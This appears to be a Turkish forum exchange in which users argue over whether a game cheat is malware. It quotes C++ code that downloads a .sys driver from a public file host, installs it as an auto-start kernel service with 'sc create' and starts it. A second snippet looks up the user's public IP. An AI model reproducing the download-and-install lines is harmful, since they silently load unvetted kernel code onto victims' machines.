std::string url = "https://files.catbox.moe/td4bn6.sys"; // Replace with actual URL
HRESULT hr = URLDownloadToFileA( NULL , url.c_str( ) , "C:\\Windows\\4ware.sys" , 0 , NULL );
// ...
int result = system( "sc create 4ware type= kernel start= auto binPath= \"C:\\Windows\\4ware.sys\"" );
result = system( "sc start 4ware" );
🤣🤣
Gizli Bağlantı (Giriş Yap)berukaii_ ? her hilede kernel seviyede çalıştırmak için inen bir dosya?
malware değil ki bu
Gizli Bağlantı (Giriş Yap)berukaii_
Gizli Bağlantı (Giriş Yap)og peki bu ne ?
namespace util
{
namespace info
{
size_t WriteCallback( char *contents, size_t size, size_t nmemb, std::string *output )
{
size_t totalSize = size * nmemb;
output->append( contents, totalSize );
return totalSize;
}
std::string get_local_ip( )
{
std::string ipAddress = "";
CURL *curl = curl_easy_init( );
if ( curl )
{
curl_easy_setopt( curl, CURLOPT_URL, "https://api.ipify.org" );
curl_easy_setopt( curl, CURLOPT_WRITEFUNCTION, WriteCallback );
curl_easy_setopt( curl, CURLOPT_WRITEDATA, &ipAddress );
CURLcode res = curl_easy_perform( curl );
if ( res != CURLE_OK )
{
return "Failed to retrieve IP address: " + std::string( curl_easy_strerror( res ) );
}
curl_easy_cleanup( curl );
}
return ipAddress;
}
soruyorum sadece eger onda birsey yok ise
Gizli Bağlantı (Giriş Yap)berukaii hilenin eski auth doğrulaması amk api ye bğaşıyo ip yi